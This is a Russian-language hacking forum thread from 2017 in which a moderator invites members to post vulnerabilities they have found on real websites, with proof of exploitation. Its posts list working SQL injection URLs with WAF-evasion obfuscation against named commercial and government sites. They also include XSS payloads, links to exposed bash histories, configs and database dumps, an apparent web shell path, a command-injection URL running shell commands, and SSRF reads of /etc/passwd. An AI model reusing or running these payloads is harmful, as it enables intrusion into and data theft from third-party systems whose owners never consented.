Дата: 14/12/17 - 20:12 pm   9416 Тем и 91923 Сообщений

Автор Тема: Ваши найденные уязвимости  (Прочитано 52964 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Июня 13, 2017, 03:30:29 am
Прочитано 52964 раз

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 40
    02.03.17
  • Reputation:
    21
    • Просмотр профиля
Предлагаю в этой  теме  выкладывать вами найденные уязвимости.
Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. для этого достаточно в google сделать запрос : site:damagelab.in  ваш_уязвимый_сайт   
                ВАЖНО:
 1)  Пост должен содержать  уникальный сайт(нигде ране не опубликован с подобной уязвимостью)
 2)  Пост может  сопровождаться  вашими комментариями  и  куском  кода  при необходимости
 3)  Пост  должен содержать результат  эксплуатации уязвимости.  Для  sql  достаточно   будет  получить   версию, пользователя или название базы.  xss aler(); 
  4)  Если по тем или иным причинам выложить сайт не возможно, или  уязвимость носит другой  характер, ошибка   конфигурации или  бинарная  , тогда   принимаются  скрины   плюс описание  уязвимости, метода её эксплуатаци и результат.

                       
 Пример :

SQL inj
http://www.styleme.co.in/index.php?action=reviewdetail&id=26  union select GROUP_CONCAT(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()

Бекап

Цитировать
https://vobjem.ru/dump.sql

   
В теме запрещены  посты  не  по теме.
Старайтесь выкладывать уязвимость с кодом - это будет вам большой плюс.


« Последнее редактирование: Июня 13, 2017, 04:13:15 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Июня 13, 2017, 05:31:28 pm
Ответ #1

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 40
    02.03.17
  • Reputation:
    21
    • Просмотр профиля
https://www.anti-malware.ru/.bash_history
https://www.anti-malware.ru/phpinfo.php
А казалось бы  серьёзный ресурс, около ибэ

http://доу233ржд.рф/www.zip
Качаем, открываем файл config и смотрим данные


http://www.bikesbikesbikesuk.com/list.php?catid=1+UnIon+select+111111111,(select  group_concat(0x3c62723e,table_name)+from+information_schema.tables   where table_schema=database()),3333333333333333,44444444444444444,5555555555555555,66666666666666,77777777777777,8888888888888888,999999999999+--+-

https://www.pecpodsnezkou.cz/hasici/akce-detail.php?id=1363516980+UnIon+seLect+1,2,3,GroUp_concat(0x3c62723e,TaBle_name,0x20,column_name ),5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_schema=database()

http://www.quicktrade.co.in/category_list.php?id=32+/*!50000UnIoN*/+SeLecT+1,2,3,/*!12345CoNcat*/(0x3c68313e,TabLe_name),5,6,7,8,9,10,11,12,13,14+from+/*!12345information_schema.tables*/+--+-

http://www.lambbuilding.co.uk/practice/arealist.php?id=20+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!12345database*/())))--

http://www.lambbuilding.co.uk/practice/arealist.php
?id=20+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!50000concat*/(/*!12345table_name*/)+/*!13337from*/+/*!50000information_schema.tables*/  limit 66,1)))--

http://unisunbd.com/page.php?cid=1&page=-522'+/*!13337UNiOn*/+seLect+1,table_name,3,4,5+from+/*!13337information_schema.tables*/limit  20,1+--+-
http://www.larrysparks.com/gallery.php?id=1'+/*!50000UnIoN*/+SeLect+user(),2,3,4+--+-
http://cart.shoppingtechnology.com/cart/affiliate-agreement.cfm
?storeid=3+ and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))--


http://my-files.ru/qxqv6p
Дамп  нескольких сайтов
 
ssrf
http://www.1-hit.com/sniffer.htm


ssrf
http://testuri.org/sniffer



SSRF
http://www.getacert.com


getacert.com Ещё  тут рце нашёл  или command injection 

SSRF
http://web-sniffer.me

Вот  сила  данной  атаки, попробуйте Nmap -p 25  web-sniffer.me
« Последнее редактирование: Июня 29, 2017, 03:20:50 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Июля 08, 2017, 03:13:27 am
Ответ #2

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 40
    02.03.17
  • Reputation:
    21
    • Просмотр профиля
Легенькая  sql+waf
http://www.bpc.gov.bd/contactus.php?id=-13'+/*!50000UniOn*/+SeLecT+1,2,/*!12345GrOuP_CoNCaT(TaBle_NaMe,0x2020,CoLuMn_NaMe)*/,4,5,6,7+FrOM+/*!50000InFoRmaTioN_SchEMa*/.CoLuMnS/*!50000+WhEre*/ TaBle_SchEma=DaTabAsE()+--+-
https://www.micro-mechanics.com/about.php?id=-3+/*!50000UnIOn*/+SeLecT+1,2,/*!12345GroUp_CoNcaT%28username,0x3c62723e,password%20%29*/,4,5,6,7,8,9,10,11%20FroM%20admin
http://eco3d.co.uk/library/browse.php?catid=-1372+UnIoN+SeLEcT+1,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),3,4,5,6,7
http://reelmen.com/shop-browse.php?catId=3') UNION ALL SELECT GrOuP_CONCAT(0x3c62723e,0x223e3c62723e,TaBle_NaMe,0x2020,CoLuMn_NaMe),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FrOM+InFoRmaTioN_SchEMa.CoLuMnS+WhEre TaBle_SchEma=DaTabAsE()--+-

sql+waf
http://www.tacc.co.il/story.php?id=-9  /*!12345UnIoN+*//*!13337SeLEcT+*/1,2,3,4,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a),6,7,8


XSS
http://easygirls.org/bad.php?texid=><script>alert(123);</script></


SQL
http://www.xenon-rus.ru/search/?searchstring=1"+" and extractvalue(0x0a,concat(0x0a,(select database())))+--+-
Крутим,смотрим, читаем , есть всё  что бы  в  1  запрос залить шел, надо найти только одно. Для самостоятельной работы

http://srn.su/wp-content/themes/1.php


Уязвимость в  пакете  обработки видео.
https://www.onlinevideoconverter.com
https://youtu.be/FaVTfkoOqn4
Цитировать
https://convertio.co
https://online-converting.ru/
http://www.konvertor.org/
Результат http://files.danstools.com/file-convert/result/output.mp4?_ga=2.130601295.1333876469.1501975828-741135336.1501975828
https://cloudconvert.com/

SQL
https://www.beautydepot.ru/search.php?search=process&title=&for=&cat=&subcategory=&family=&nota1=&nota2=%27+and%20extractvalue(0x0a,concat(0x0a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()+limit%2018,1)))+--+-&nota3=&price=%27&page=847%27
« Последнее редактирование: Августа 17, 2017, 05:29:08 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Августа 23, 2017, 08:42:28 pm
Ответ #3

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 40
    02.03.17
  • Reputation:
    21
    • Просмотр профиля
SSRF, XSS and race condition

www.tutorialspoint.com/online_xml_editor.htm
уязвимости в форме загрузки файла

<?php 
  $type = isset($_GET['type'])?$_GET['type']:'';
   if($type != ''){
      $url = $_GET['url'];
      $url = preg_replace('#^https?://#', 'http://', $url);
      $opts = array(
        'http'=>array(
        'method'=>"GET",
        'header'=>"Accept-language: en\r\n" .
                    "Cookie: foo=bar\r\n"
        )
      );
      if(filter_var($url, FILTER_VALIDATE_URL) === false) {
           echo("$url is not a valid URL");
           exit;
      }
      $context = stream_context_create($opts);
      $data = file_get_contents ($url,false,$context);
      if(empty($data)){
         echo -1;
      } else {
         echo $data;   
      }
     
   } else {
      $file = $_FILES['file'];
      $filepath = '/tmp/'. $file['name'];
     $filename = realpath( $filepath );
      if(move_uploaded_file($file['tmp_name'],$filepath ))   
      {
         chmod($filepath, 0777);
         $data = file_get_contents ($filepath);   
         echo $data;
      unlink($filepath);
      }
     
   }
   exit;
?>
НО, к  сожалению из за  особенности  веб сервера   состоянии гонки не  эксплуатируемая

Для локального теста используйте форуму.
<form  method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><input name=file type=file><input type=text name=uploadDir value=><input type=submit name=upload value=up></form>
 

или ресурс
http://SiteTestNax.ua.host1614634.serv16.hostland.pro/

Цитировать
1) Переходим на сайт, видим  Форму загрузки.
2) открываем исходный код, мы видим, что есть исходники.
3) понимаем, что там ssrf. Проверяем
4) http://sitetestnax.ua.host1614634.serv16.hostland.pro/?url=http://gogle.com&type=1
http://Http://sitetestnax.ua.host1614634.serv16.hostland.pro/?url=file:///etc/passwd&type=1
5) Форма загрузки .
Обратим внимание на код


$file = $_FILES['file'];
      $filepath = '/home/host1614634/tmp/'. $file['name'];
     $filename = realpath( $filepath );
      if(move_uploaded_file($file['tmp_name'],$filepath ))
      {
         chmod($filepath, 0777);
     @    $data = file_get_contents ($filepath);
          echo  '<pre>';
         echo $data;
          echo  '</pre>';
      unlink($filepath);
Понимаем, что уязвимость состояния гонки

6)
пишем  скрипт, или в  бурпе  делаем запросы, 
1-й  запрос  на  загрузку  файла,  второй  обращение  к  файлу


7) Та же  есть  XSS
http://sitetestnax.ua.host1614634.serv16.hostland.pro/?url=<script>alert(123)</script>&type=1






 http://audio.nur.kz/search?
"><script>alert(12313);</script>  xss  poisk
http://audio.nur.kz/config/sphinx/gen/sphinx-dev.conf   config



 Command inj
https://dict.longdo.com/?is-auto-language=true&search=the&translate-language=d%7cls -lah%26uname%20%2da%26&translate-type=popthai
« Последнее редактирование: Августа 29, 2017, 01:03:14 pm от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Декабря 07, 2017, 12:06:23 am
Ответ #4

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 40
    02.03.17
  • Reputation:
    21
    • Просмотр профиля
SSRF  Подъехала
https://us.hidester.co

Кто  сможет  перейти на другой протокол  пишите  метод
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep